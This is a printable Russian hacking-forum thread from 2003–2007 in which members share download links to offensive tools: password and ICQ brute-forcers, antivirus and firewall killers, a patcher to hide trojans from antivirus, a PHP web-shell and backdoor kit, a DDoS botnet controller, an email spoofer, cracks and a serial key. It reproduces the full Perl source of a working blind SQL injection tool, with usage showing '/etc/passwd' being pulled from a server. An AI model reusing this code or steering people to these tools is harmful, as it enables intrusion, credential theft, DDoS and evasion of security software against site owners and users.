Версия для печати темы

Автор: Spidey 21.08.2003, 15:55

Автор: Spidey 22.08.2003, 12:51

http://www.antichat.ru/soft/words.zip (uknown)- Сборник слов для брутуса.

Автор: o][yd 14.11.2003, 22:39

http://ifud.ru/ipd/IPDbrute2udc2Pro.rar

Проводит брутфорс по веденному номеру ICQ

Поддерживает списки HTTPS проксей (метод CONNECT)

Многопоточный / через протокол ICQv8

Поддержка паролей в HEX (0x0d, 0x0a, и т. д.)

Поддерживает листы UIN’ов на проверку...

Удаляет неработающие прокси

Запуску из командной строки – просто ведите "IPDbrute2.exe autostar

Автор: trojanec 1.12.2003, 02:06

Новая демо версия XSpider 7



http://www.ptsecurity.ru/xs7download.asp

Автор: [xaos] 28.03.2004, 12:38

Автор: Spidey 29.03.2004, 11:41

http://www.madalf.ru/cgi-bin/stetchik/bsdcc.pl?19 ( 375 kb - windows ) - Всем поможет. Программа для востановления утерянных паролей. Короче поможет.

Автор: anechka_19 12.04.2004, 23:02

http://mirror1.safety-lab.com/SSS.exe кряк на асталависте..
http://www.freeproxy.ru/download/socks_checker.exe там же куча других прожек для работы с проксями
http://www.insidepro.com/download/passwordspro.zip Вообщем подбор MD5 и по словарю и брутофорсом и по маске. Так же еще и MD4 и показывает пароли скрытые звездочками.. но это не интересно.

Нравицца еще програмка Xavior Beta7 - подбор паролей через веб.. куча настроек. Она есть на этом сайте. В разделе soft.

Автор: anechka_19 12.04.2004, 23:13

Ах вот еще интересная програмка http://msender.chat.ru/mailsender.zip через нее можно отсылать мэйлы от чужого ящика и попортить немало нервов владельцу этого самого ящика и заставить его судорожно менять пароли ) Только она каким то не особо вредным вирусняком заражена.. Кто предупрежден - тот вооружен.
Вообще-то подмену можно и через telnet устроить. Кому как нравицца.

Автор: cannabis 16.04.2004, 06:12

Check Proxy Professional has the following features:

- Managing / checking HTTP proxy lists;
- Proxy list printing;
- Proxy anonymity level detection;
- Determines type of the proxy server (Anonymous/Transparent);
- Determines speed of the proxy server;
- Determines Location (country) of the proxy server;
- Recognize different formats of proxy list (separated by colon, spaces, tabs, etc.);
- Proxy finder (Proxy Hunter);
- Supports multi-threading (can check many proxies simultaneously);
- Daily updates of the database.


http://www.checkproxy.com/downloads/d2/CheckpPro-HTTP-Demo-4.00-500.EXE


очен нужная вешч!

Автор: cannabis 22.04.2004, 06:02

http://www.wolfgang-brinkmann.de/BartPE/cain.cab

Сain&Abel

Автор: Iskr 25.09.2004, 20:03

Вот прога для того чтобы патчить файлы склеенные с троем, как правило Антивирь его после етого не видит...

Никто не поможет найти новую версию и крякк ней???

 pe_patcher.zip ( 92,16 килобайт ) : 1997

Автор: NADZIRATEL 25.09.2004, 20:06

кряк конечно поможем!
http://crackspider.net/search.shtml?q=pe_patcher&x=18&y=9

Автор: Str@nNIK 10.10.2004, 03:25

кому там надо было обойти или убить огненную стену? )))Держите.
к сожалению с лекарством беда- не успел найти ((

 antifrwl.zip ( 399,94 килобайт ) : 211

Автор: Str@nNIK 10.10.2004, 03:33

да и ще такойвот нюк,все по той же теме:
Новый нюкер для Windows. Быстрый и маленький, с возможностью
остановить в нужный момент, с возможностью подмены IP адреса и
контролем ошибок...

 nukeit.zip ( 12,23 килобайт ) : 2097

Автор: Str@nNIK 10.10.2004, 03:38

Sorri ne to )))) A vot to:Программа убивает на машине пользователя firewall? и антивирусы, выбранные приложения.

 optixkiller3.zip ( 281,14 килобайт ) : 297

Автор: Micro 5.11.2004, 23:04

А http://www.nirsoft.net/utils/pspv.zip (30 кб) «восстанавливает» информацию автозаполнения и Protected Storage (пароли для доступа к FTP-серверам и других мест) в IE и MSN Explorer (логин/пароль), пароли от POP3 аккаунтов Outlook Express.

Точно также всю необходимую информацию можно копировать буфер или сохранять в файл в текстовых и html форматах

Автор: Swen47 14.11.2004, 09:06

Mail PassView
Прога позволяет посмотреть пасс для почтовых программ.
Непроверял из-за отсутствия таковых.

Автор: Micro 15.11.2004, 22:04

http://www.nirsoft.net/utils/iecv.zip (95 кб) служит для просмотра детальной информации о куках (поддерживается только IE). Можно сортировать все куки по люой колонке, находить нужное путем указания имени сайта, удалять нежелательные, сохранять в обычный текстовый файл, копировать информацию в буфер, просматривать куки других пользователей (если есть доступ), изменять содержимое и т.д.

Автор: Micro 16.11.2004, 15:36

Swen47
Ой не рассмотрел ты её не туда запихал

Добавлено @ [mergetime]1100608926[/mergetime]
Крохотная программа whois-клиент, позволяющая получить информацию о любом домене — http://www.gena01.com/win32whois/win32whois_0_9_1.zip (13 кб). Можно получать контактную, инфоормацию о DNS-серверах, блок ip-адресов и т.д. Подробнее на http://www.gena01.com/win32whois.

Вроде не было

Автор: Swen47 16.11.2004, 16:58

http://bmerussia.com/0day/SmartWhois3.6.exe

Автор: Micro 17.11.2004, 18:21

1st Ip Port Scanner v2.0
Иногда нас всех тянет на дела хакерские. Например - просканировать диапазон ip на предмет открытых портов. Программа показала себя в тесте как качественный продуманный продукт.

Возможность выбирать тип пинга и резолв ипов в хостнеймы. Диапазон сканируемых портов. Да и интерфейс радует.

В поле отображения результатов выводятся в древовидной структуре ответившие на запрос машины и название сервисов, висящих на их открытых портах. Очень удобно!

http://195.96.182.180/uinz.ru/1111/1st.Ip.Port.Scanner.v2.0.Cracked-EXPLOSiON_UINZ.ru.zip [1.1 MB]
Взято с http://www.uinz.ru/

Автор: bdrFsg 22.11.2004, 17:48

Blue`s Port Scanner 5.0.2 - megaspeed!http://www.xakep.ru
IP Tools 2.20 рулеззhttp://www.xakep.ru
Putty - не помешает!

Автор: jur15t 29.01.2005, 16:16

может надо кому...
http://secondarytester.narod.ru/new/NScan.exe

Автор: CMEP4 23.02.2005, 22:46

универсальный сканер из 15 инструментов.
очень жаль что не поддерживает udp
для регистрации
name rth77!
code A9D206B673EC72DB71A353CDC987788211B6C0BE09F366EF9E2B4E025CC25BA1609783C3E1AEDC66
5827927997FEFB0ED2253DB1DA23373A4221B0B455396FBDDD6AFFD1A0B73CA6D9BDA7107985903C

 iptools.zip ( 66,99 килобайт ) : 122

Автор: flax 30.08.2005, 12:21

Прога для распаковки некоторых PE Файлов. Иногда бывает очень полезна.

 pe_scan.rar ( 68,72 килобайт ) : 57

Автор: MisterGenady 8.12.2005, 12:49

wwwHack

 wwwhack.zip ( 430,61 килобайт ) : 239

Автор: MisterGenady 4.03.2006, 19:53

Порты Троянских Прог

 ____________________.pdf ( 145,44 килобайт ) : 168

Автор: DeathMan 6.06.2006, 23:18

А чего ни одного линка на закачку? И программа WWWHack, насколько я помню, для получения http форм сайта, а не для взлома паролей...хотя могу ошибаться!

Автор: Creeping Death 14.08.2006, 01:10

ArabianAttacker (WHTK) 1.0

Download it from here :
http://www.tm-world.net/ArabianAttacker/Download/ArabianAttacker-(WHTK).zip

Shell's inside :
c99
c99edited
r57-en
r57-ru
r57-ar
DX-Shell
RemView
WebAdmin
My-Shell

other files :
netcat
mswi (MySQL-Web-Interface)
cgi-telnet
e-mailLlistMackeR
IP-Logger
backdoor

Автор: LEVIAFAN 19.08.2006, 12:18

Cain & Abel v2.7.5 for Windows NT/2000/XP

http://www.oxid.it/downloads/ca_setup.exe

Автор: Creeping Death 18.09.2006, 16:03

NST Simple HTTP Scanner
is a tool programmed in C to find vulnerabilities on remote web servers by looking for files and directories.

The version 0.4 was released. In this version i implemented the POSIX threads (pthread). This way, the scanning its much more faster. Compiling the scanner with pthreads under a Windows plataform it's not easy at all. Here you have a link with the pthread-win32lib files and a readme file with all the instructions to make the scan work with the library (pthread-win32lib was tested under Windows XP SP2 compiling with the IDE Dev-C++ 4.9.9.2):
In the readme file of the scanner you can see how to compile the scanner under Linux (with GCC, adding the -lpthread for link the library) and under Windows.

New skills

- Security bugs fixed
- HTML Report improved
- New feature: subdomains scanning
- New feature: option -u for updates check
- New feature: use of POSIX threads (the scanner is much more faster)
- Default requests.txt improved

http://www.neosecurityteam.net/download.php?id=32

http://www.neosecurityteam.net/tools/sHTTP...canner_v0.4.exe
http://www.neosecurityteam.net/tools/sHTTP...canner_v0.4.bin


http://sourceforge.net/projects/shttpscanner/

Автор: Valter 27.09.2006, 02:00

http://www.cracklab.ru/download.php?action=get&n=MTU= Наверное самый лучший шестнадцатиричный редактор. Позволет редактировать файлы, память, диски, отображение адресации в HEX и десятичном формате, отображает значения, как байты, слова, двойные слова. Может конвертировать информацию (прибавлять, модифицировать по XOR). Может выдать исходники массива на паскале или си. Может производить автозамену по шестнадцатиричным значениям и по строкам. В общем, он лучший ! Хотя и не новинка для народа!

И ешо куча всякой хакерской всячины с этого сайта http://www.cracklab.ru/

Автор: Creeping Death 15.10.2006, 01:08

BitWise IM Personal 1.7.2

BitWise IM – IM клиент прямого общения и программа голосового чата, которая шифрует все сообщения и передаваемые данные.

BitWise IM работает с минимальным взаимодействием с сервером и позволяет работать в “безсерверном” режиме с поддержкой текстовых макросов, оффлайн сообщений, форвард на email, невидимый режим и многое другое. BitWise IM позволяет передавать файлы и содержит Web интерфейс для отправки сообщения и проверки оффлайн сообщений с любого компьютера, используя только Web браузер.

http://www.bitwiseim.com

Автор: [fR4g] 22.12.2006, 12:31

TrueCrypt v4.2a
Прога для шифрования дисков / создания зашифрованных образов.
Удобно делать зашифрованные флешки.
OpenSource, FreeWare. Засим есть шансы, что нет лазеек для того, кто очень попросит.
PS: Позволяет внутри существующего тома делать второй скрытый.
http://www.truecrypt.org/downloads.php
маст хэв.

Автор: self 28.12.2006, 13:08

tia, аналог :

Автор: Creeping Death 12.01.2007, 12:52

bsqlbfv1.2
скрипт для подбора запросов при слепой SQL-Injection

#!/usr/bin/perl
# Blind SQL Injection POC. aramosf@514.es // http://www.514.es
#
# CHANGELOG:
# Tue Jul 13 10:14:19 RST 2006
# + threads support. for hungry hackers.
# Wed Jul 12 14:04:33 RST 2006
# + change sql teqneez mcdonalds powah 8) (more than 40% optimization)
# please, rip me!!, make your own paper!! =]
# + support for windows files (for example: C:\\boot.ini)
# + support for " and 1="1 sql injection
# + -binary and -ascii support
# - -charset option removed
# - -dict option removed
# + upgrade to v1.2
# Sat Apr 1 03:13:01 CEST 2006
# + -get now support resume (with -start option)
# Thu Mar 30 02:06:41 CEST 2006
# -get to fetch files (thank you ilo AGAIN)
# ***** RELIABLE SPEED IMPROVEMENT USING SOME SKILLS OF SQL AND BRAIN!!***
# Sat Mar 25 13:57:39 CET 2006
# Release `haqerz edition` of bsqlbf:
# + -time option added (IDS bypass)
# + -rtime option added (IDS bypass)
# + -rproxy option added (IDS bypass)
# + -ruagent option added (IDS bypass)
# Sun Dec 11 11:01:34 CET 2005
# + fixed automatch in POSTs
# + better output
# Mon Dec 5 18:30:03 CET 2005
# + added -blind option (to specify which attribute have sql injection).
# Tue Nov 29 17:31:54 CET 2005
# + auto search match string (when they arent -match option)
# Mon Nov 28 16:34:09 CET 2005
# + Support for POST and GET methods (-method get // -method post).
# + Cookies support (-cookie "blah=foo; moo=doo").
# + UserAgent support (-uagent "SQL Blind tool").
# Wed Nov 23 23:44:23 RST 2005
# First version 0.1:
# + code ripped from www.reversing.org <ilo[at]reversing.org> (thanks!)
#
#
# TODO:
# [ ] Rip more code from others.

use LWP::UserAgent;
use Getopt::Long;
use IO::Handle;
use strict;
use threads;
use threads::shared;
use Time::HiRes qw( usleep);

$| = 1;


###############################################################################
my $default_debug = 0;
my $default_length = 32;
my $default_method = "GET";
my $default_time = 0;
my $version = "1.2";
my $default_useragent = "bsqlbf $version";
my $default_sql = "version()";
###############################################################################


$| = 1;

my ($args, $solution);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my ($head, $tail, $high);
my $hits = 0;
my $amatch = 0;
my ($ua,$req);
my $furl;

###############################################################################
# Define GetOpt:
my ($url, $sql, $time, $rtime, $match, $uagent, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
my ($start, $length, $method, $cookie, $blind);
my ($help, $get);
my ($ascii, $binary);

my $options = GetOptions (
'help!' => \$help,
'url=s' => \$url,
'get=s' => \$get,
'sql=s' => \$sql,
'blind=s' => \$blind,
'match=s' => \$match,
'start=s' => \$start,
'length=s' => \$length,
'method=s' => \$method,
'uagent=s' => \$uagent,
'ruagent=s' => \$ruagent,
'cookie=s' => \$cookie,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'rproxy=s' => \$rproxy,
'debug!' => \$debug,
'binary!' =>\$binary,
'ascii!' => \$ascii,
'rtime=s' => \$rtime,
'time=i' => \$time );

&help unless ($url);
&help if $help eq 1;

#########################################################################
# Default Options.
$uagent ||= $default_useragent;
$debug ||= $default_debug;
$length ||= $default_length;
$solution ||= $start;
$method ||= $default_method;
$sql ||= $default_sql;
$time ||= $default_time;


&createlwp();
&parseurl();

if ( ! defined($blind)) {
$lastvar = $varsb[$#varsb];
$lastval = $vars{$lastvar};
} else {
$lastvar = $blind;
$lastval = $vars{$blind};
}

if (defined($cookie)) { &cookie() }

if (!$match) {
print "\nTrying to find a match string...\n" if $debug == 1;
$amatch = "1";
$match = fmatch("$url"," AND 1=");
if ($match eq "no vulnerable") {
print "\nNo vuln: 2nd..\n" if $debug ==1;
$match = fmatch("$url","\" AND 1=\"");
$head = "\"";
$tail = " AND 1=\"1";
};
if ($match eq "no vulnerable") {
print "Not vulnerable or use -blind\n";
exit 0;
}
}

&banner();
&httpintro();



( ! $get) ? sqlget() : fileget();

my @byte = ();
my $wait_me;

sub getbyte {
my $sql = $_[0];
my $bit="";
my @thread_count = ();
my $c = 8;
my $i = 0;
$high = 128 unless $ascii;#) ? 128 : { 64; $byte[0] = 0; };
$wait_me = 0;

share($wait_me);
share (@byte);

if ($ascii) {
$byte[0] = 0;
$high = 64;
}
for ($bit=1;$bit<=$high;$bit*=2) {
# launch thread ->
$thread_count[$i] = threads->create(\&launch_thread ,$sql, $bit, $c);
$thread_count[$i]->detach;
$c--;
}

while ($wait_me <= 7) {
usleep(50);
#sleep(1);# if !$dontsleep;
}

my $str = join("",@byte);
#print "\nSTR: $str\n";
return pack("B*","$str");

}

sub launch_thread {
my ($sql, $bit, $c) = @_;
my $val = "$head and (ord($sql) %26 $bit)=0 $tail";
#print "VAL[$c] $val\n";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $val;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$val/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
lock @byte;
if (/\Q$match\E/) {
$byte[$c]=0;
last;
} else { $byte[$c] = 1; }
}
lock $wait_me;
threads->yield();
$wait_me++;
}

sub sqlget {
my ($fsize,$i,$s);
$s = "mid(length(length($sql)),1,1)";
my $lng .= getbyte($s);
for ($i=1;$i<=$lng;$i++) {
$s = "mid(length($sql),$i,1)";
$fsize.=getbyte($s);
}

#print "FSIZE: $fsize\n";
$length = $fsize. "bytes";
&bsqlintro();

my $rsize = $start + 1;
for ($i=$rsize;$i<=$fsize+1;$i++) {
$s = "mid($sql,$i,1)";
#print "S: $s\n";
my $byte = getbyte($s);
$solution .= $byte;
print $byte;
}
}

sub fileget {
my ($lget,$fstr);
if ($get =~ m/.*\/(.*)/) {
$lget = $1; }
$fstr = "0x".unpack("H*","$get");
if ($get =~ m/.*\\(.*)/) {
$lget = $1;
$fstr = "\"$get\"";
}

my $rsize = $start + 1;
if (-e "$lget" && ! $start) {
$rsize = -s "$lget";
print "Error: file ./$lget exists.\n";
print "You can erase or resume it with: -start $rsize\n";
exit 1
}
my ($i,$fsize);
$sql = "mid(length(length(load_file($fstr))),1,1)";
my $lng .= getbyte($sql);
for ($i=1;$i<=$lng;$i++) {
my $find = 0;
$sql = "mid(length(load_file($fstr)),$i,1)";
$fsize.=getbyte($sql);
}

if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
$length = $fsize. "bytes";
# starting ..
$sql = "load_file($get)";

&bsqlintro();
# Get file
#print "---> $lget";
open FILE, ">>$lget";
FILE->autoflush(1);
print "\n--- BEGIN ---\n";
my ($i,$b,$fcontent);
$rsize = 1 if $rsize < 1;
for ($i=$rsize;$i<=$fsize+1;$i++) {
my $find = 0;
my ($furl, $b_start, $b_end, $z);
$sql = "mid(load_file($fstr),$i,1)";
$fcontent=getbyte($sql);
print $fcontent;
print FILE "$fcontent";
}
print "\n--- END ---\n";
close FILE;
$solution = "success";
$sql = "$get";
}



&result();

#########################################################################
sub httpintro {
my ($strcookie, $strproxy, $struagent, $strtime, $i);
print "--[ http options ]"; print "-"x62; print "\n";
printf ("%12s %-8s %11s %-20s\n","schema:",$scheme,"host:",$authority);
if ($ruagent) { $struagent="rnd.file:$ruagent" } else { $struagent = $uagent }
printf ("%12s %-8s %11s %-20s\n","method:",uc($method),"useragent:",$struagent);
printf ("%12s %-50s\n","path:", $path);
foreach (keys %vars) {
$i++;
printf ("%12s %-15s = %-40s\n","arg[$i]:",$_,$vars{$_});
}
if (! $cookie) { $strcookie="(null)" } else { $strcookie = $cookie; }
printf ("%12s %-50s\n","cookies:",$strcookie);
if (! $proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy = $proxy; }
if ($rproxy) { $strproxy = "rnd.file:$rproxy" }
printf ("%12s %-50s\n","proxy_host:",$strproxy);
if (! $proxy_user) { $strproxy="(null)" } else { $strproxy = $proxy_user; }
# timing
if (! $time && !$rtime) { $strtime="0sec (default)" }
if ( $time == 0) { $strtime="0 sec (default)" }
if ( $time == 1) { $strtime="15 secs" }
if ( $time == 2) { $strtime="5 mins" }
if ($rtime) { $strtime = "rnd.time:$rtime" }
printf ("%12s %-50s\n","time:",$strtime);
}

sub bsqlintro {
my ($strstart, $strblind, $strlen, $strmatch, $strsql);
print "\n--[ blind sql injection options ]"; print "-"x47; print "\n";
if (! $start) { $strstart = "(null)"; } else { $strstart = $start; }
if (! $blind) { $strblind = "(last) $lastvar"; } else { $strblind = $blind; }
printf ("%12s %-15s %11s %-20s\n","blind:",$strblind,"start:",$strstart);
if ($length eq $default_length) { $strlen = "$length (default)" } else { $strlen = $length; }
if ($sql eq $default_sql) { $strsql = "$sql (default)"; } else { $strsql = $sql; }
printf ("%12s %-15s %11s %-20s\n","length:",$strlen,"sql:",$strsql);
if ($amatch eq 1) { $strmatch = "auto match:" } else { $strmatch = "match:"; }
#printf ("%12s %-60s\n","$strmatch",$match);
print " $strmatch $match\n";
print "-"x80; print "\n\n";
}

#########################################################################

sub createlwp {
my $proxyc;
&getproxy;
&getuagent if $ruagent;
LWP::Debug::level('+') if $debug gt 3;
$ua = new LWP::UserAgent(
cookie_jar=> { file => "$$.cookie" });
$ua->agent("$uagent");
if (defined($proxy_user) && defined($proxy_pass)) {
my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
$proxy =~ m|^(?:([^:/?#]+)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
$proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
} else { $proxyc = $proxy; }

$ua->proxy(['http'] => $proxyc) if $proxy;
undef $proxy if $rproxy;
undef $uagent if $ruagent;
}

sub cookie {
# Cookies check
if ($cookie || $cookie =~ /; /) {
foreach my $c (split /;/, $cookie) {
my ($a,$b) = split /=/, $c;
if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
}
}
}

sub parseurl {
###############################################################################
# Official Regexp to parse URI. Thank you somebody.
($scheme, $authority, $path, $query, $fragment) =
$url =~ m|^(?:([^:/?#]+)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
# Parse args of URI into %vars and @varsb.
foreach my $varval (split /&/, $query) {
my ($var, $val) = split /=/, $varval;
$vars{$var} = $val;
push(@varsb, $var);
}
}


#########################################################################
# Show options at running:
sub banner {
print "\n // Blind SQL injection brute force.\n";
print " // aramosf\@514.es / http://www.514.es\n\n";
}


#########################################################################
# Get differences in HTML
sub fmatch {
my ($ok,$rtrn);
my ($furla, $furlb,$quote) = ($_[0], $_[0],$_[1]);
my ($html_a, $html_b);
if (lc($method) eq "get") {
$furla =~ s/($lastvar=$lastval)/$1 ${quote}1/;
$furlb =~ s/($lastvar=$lastval)/$1 ${quote}0/;
$html_a = fetch("$furla");
$html_b = fetch("$furlb");
} elsif (lc($method) eq "post") {
$vars{$lastvar} = $lastval . " ${quote}1";
$html_a = fetch("$furla");
$vars{$lastvar} = $lastval . " ${quote}0";
$html_b = fetch("$furla");
$vars{$lastvar} = $lastval;
}


#print "$html_a";
#print "$html_b";

if ($html_a eq $html_b) {
$rtrn = "no vulnerable";
return $rtrn;
}


my @h_a = split(/\n/,$html_a);
my @h_b = split(/\n/,$html_b);
foreach my $a (@h_a) {
$ok = 0;
if ($a =~ /\w/) {
foreach (@h_b) {
if ($a eq $_) {$ok = 1; }
}
} else { $ok = 1; }
$rtrn = $a;
last if $ok ne 1;
}
return $rtrn;
}


#########################################################################
# Fetch HTML from WWW
sub fetch {
print "fetch: $_[0]\n";
my $secs;
if ($time == 0) { $secs = 0 }
elsif ($time == 1) { $secs = 15 }
elsif ($time == 2) { $secs = 300 }
if ($rtime =~ /\d*-\d*/ && $time == 0) {
my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
srand; $secs = int(rand($p-$l+1))+$l;
} elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
print "You can't run with -time and -rtime. See -help.\n";
exit 1;
}
sleep $secs;

my $res;
if (lc($method) eq "get") {
my $fetch = $_[0];
if ($cookie) {
$res = $ua->get("$fetch", Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->get("$fetch");
}
} elsif (lc($method) eq "post") {
my($s, $a, $p, $q, $f) =
$url=~m|^(?:([^:/?#]+)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
my $fetch = "$s://$a".$p;
if ($cookie) {
$res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->post("$fetch",\%vars);
}
} else {
die "Wrong httpd method. Use -h for help\n";
}
my $html = $res->content();
return $html;
}


sub getproxy {
if ($rproxy && $proxy !~ /http/) {
my @lproxy;
open PROXY, $rproxy or die "Can't open file: $rproxy\n";
while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
close PROXY;
srand; my $ind = rand @lproxy;
$proxy = $lproxy[$ind];
} elsif ($rproxy && $proxy =~ /http/) {
print "You can't run with -proxy and -rproxy. See -help.\n";
exit 1;
}
}

sub getuagent {
my @uproxy;
open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
close UAGENT;
srand; my $ind = rand @uproxy;
$uagent = $uproxy[$ind];
chop($uagent);
}

sub result {
print "\r results: \n" .
" $sql = $solution\n" if length($solution) > 0;
print " total hits: $hits\n";
}


sub help {
&banner();
print " usage: $0 <-url http://www.host.com/path/script.php?foo=bar> [options]\n";
print "\n options:\n";
print " -sql:\t\tvalid SQL syntax to get; connection_id(), database(),\n";
print "\t\tsystem_user(), session_user(), current_user(), last_insert_id(),\n";
print "\t\tuser() or all data available in the requested query, for\n";
print "\t\texample: user.password. Default: version()\n";
print " -blind:\tparameter to inject sql. Default is last value of url\n";
print " -match:\tstring to match in valid query, Default is try to get auto\n";
print " -start:\tif you know the beginning of the string, use it.\n";
print " -length:\tmaximum length of value. Default is $default_length.\n";
print " -time:\t\ttimer options:\n";
print " \t0:\tdont wait. Default option.\n";
print " \t1:\twait 15 seconds\n";
print " \t2:\twait 5 minutes\n";
print " -rtime:\twait random seconds, for example: \"10-20\".\n";
print " -method:\thttp method to use; get or post. Default is $default_method.\n";
print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
print " -ruagent:\tfile with random http UserAgent header to use.\n";
print " -cookie:\thttp cookie header to use\n";
print " -rproxy:\tuse random http proxy from file list.\n";
print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
print " -proxy_user:\tproxy http user\n";
print " -proxy_pass:\tproxy http password\n";
print "\n examples:\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \"user()\"\n";
print " bash# $0 -url http://www.buggy.com/bug.php?r=514&p=3 -get \"/etc/passwd\"\n";
exit(1);
}

Автор: Creeping Death 18.01.2007, 01:51

SQL Injection TooL

Программа SQL Injection TooL предназначена для изучения БД через ошибки в программном коде веб-сайтов, а точнее она использует т.н. SQL-инъекции.

Автор: self 18.01.2007, 14:10

SAMInside 2.5.8.0

Автор: Creeping Death 20.01.2007, 13:04

RMOSChange

Программа изменяет HTTP заголовки Internet Explorer, Firefox, Mozilla,
так, что сервер(web-сайт), не сможет узнать какая у вас
установлена ОС, версия браузера и язык системы.

Избавляет от установки виртуальной машины.

конечно незабывем про proxy

Автор: Creeping Death 18.02.2007, 11:24

sqlmap

sqlmap is an automatic blind SQL injection tool, developed in python, capable of enumerating an entire remote database, performing an active database fingerprint and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

Features

* Test of the remote url stability, based on page hash or string match;
* Identification of url dynamic parameters;
* Test numeric, string (single quote and double quotes) SQL injection on all url dynamic parameters and at first vulnerable it will be used to perform the future SQL injections;
* Possible selection of HTTP method for testing and exploiting dynamic parameters, GET or POST (default: GET);
* Fingerprint of web application database back-end based upon specific queries output which identify database characteristics and banner grabbing;
* Random HTTP User-Agent header selection;
* HTTP Cookie header provided, useful when web application requires authorization based on cookies and you an account;
* Provide an anonymous HTTP proxy address to pass by request to the target url;
* Other command line parameters to get database banner, enumerate databases, tables, columns, dump values, retrieve an arbitrary file content and provide own SQL expression to query remote database;
* Debug output messages in verbose mode execution;
* PHP setting magic_quotes_gpc evasion by encoding every query string, between single quotes, with CHAR (or similar) database function.


http://www.databasesecurity.com/dbsec/sqlmap-0.3.tar.gz

Автор: Creeping Death 18.02.2007, 11:38

SQL Injection Soft

SQLInjector
http://www.ngssoftware.com/


Bobcat
http://www.northern-monkee.co.uk/projects/bobcat/bin/BobCat_Alphav0.1.zip

Automagic
http://www.databasesecurity.com/dbsec/automagic.zip


HacmeBank
http://www.databasesecurity.com/dbsec/Hacme_Bank_Setupv2.15.zip

Absinthe
http://www.0x90.org/releases/absinthe/

Typhon III
http://www.ngssoftware.com/

Автор: ~NeoN~ 7.03.2007, 18:17

смотрим куки:
IECookiesView
Protected Storage PassView

Автор: Creeping Death 11.03.2007, 16:44

MD5CRACK

Автор: Creeping Death 25.03.2007, 15:12

PHP-nuke <=8.0 Final

Автор: Creeping Death 25.03.2007, 21:29

Автор: Creeping Death 26.03.2007, 16:08

Blueprint (V. 0.1-3) - a perl tool to identify Bluetooth devices

This version recognizes about 53 different devices.


http://trifinite.org/Downloads/bp_v01-3.zip

Автор: is) 27.03.2007, 21:52

UDC
программа, созданная для быстрого восстановления пароля по хэш-значению для различных алгоритмов хэширования (более 40: MD5, NTLM, DES, MD4, SHA...).

* Обычному пользователю она поможет при восстановлении забытых паролей (например, подбор пароля в Windows), благодаря поддержке уникального мгновенного режима восстановления пароля, по похожей на него строке.

* Организации могут восстанавливать пароли к неограниченному числу пользователей одновременно, практически без потери скорости; при помощи UDC, администрация форума может за пару секунд выявить все "слабые" пароли в системе.

* Для решения более серьезных переборных задач поможет поддержка многопроцессорных систем и автоматического распределения атаки в реальном времени.

Текущая версия ядра - 2.0.9.2, обновление от 23 марта 2007 (http://the-udc.com/rus/download.html)

Новости, комментарии, помощь и словари вы найдете на нашем форуме (http://the-udc.com/forum/)

Получить полную версию UDC бесплатно! (http://the-udc.com/forum/index.php?topic=33.0)

Автор: Creeping Death 28.03.2007, 20:49

NetBot_Attacker 1.4 English version

By:Security warning team(www.hackeroo.com)Development

Function on :

NetBot_Attacker Is a comprehensive pressure as well as the DDOS test attack

He may control the most PC computer to start DDOS to attack!

The main attack type has:

Ordinary attack: SYN Flood,ICMP Flood,UDP Flood,UDP small,TCP Flood,TCP multi-link

WEB Attack:HTTP No-Cache Get Flood,CC Variety attack,HTTPGET

Special attack: GAME attack,CIDR attack,Hybrid attack

Auxiliary function::

Download operation,Shutdown unloading,Open URL,All shutdown

Help:You only need to have the FTP space and may use it,

Or you are fixed IP,Or your free application dynamic domain name.


The thanks supports NetBot_Attacker,We also opened the VIP edition.

VIP service of edition end little, EXE WROM, U records of spread, Intranet travel, attack might to be further loud .


安全警戒线(Security warning team) www.hackeroo.com

Buy VIP edition connection MSN:hackeroo#hotmail.com



http://rapidshare.com/files/22099705/NetBot_Attacker_1.4_English.rar.html

Автор: @llexxxei 11.04.2007, 13:58

Вскрываем *.rar

Автор: Gener 22.04.2007, 18:33

Metasploit Framework (согласно описанию) это законченная среда для написания, тестирования и использования кода эксплойтов. Эта среда обеспечивает надежную платформу для испытаний на проникновение, разработки шелкодов и исследования уязвимостей". Написан на Perl (с некоторыми частями на ассемблере, Python и C) – отсюда нет привязки к какой либо платформе – будет работать в любой системе, где есть интерпретатор Perl`a (с оговоркой, см. дальше). На данный момент, пакет Metasploit Framework функционирует как на Linux так и на Windows, а так же на Мас. Скачать последнюю версию пакета для соответствующей ОС можно здесь: http://www.metasploit.com/
(Среда под Windows базируется на доработанном Cygwin, что удобно, т.к. это дает пользователю извесную консоль. Однако, были некоторые проблемы с поддержкой Active Perl, поэтому поддерживается только Cygwin Perl.

Вот прямые линки для скачивания последней версии:

Автор: Gener 25.04.2007, 20:17

Mail.ru Loginer Free

Чекер мыл на сервера mail.ru (и всех поддоменах)
+малый траф (13 мыл примерно 24 кб)
+высокая скорость работы
+работает с парсеными логами
+drag&drop файла в окно программы с распознованием его типа

Автор: Creeping Death 6.05.2007, 18:32

Cнимаем пароли. небольшой список программ.

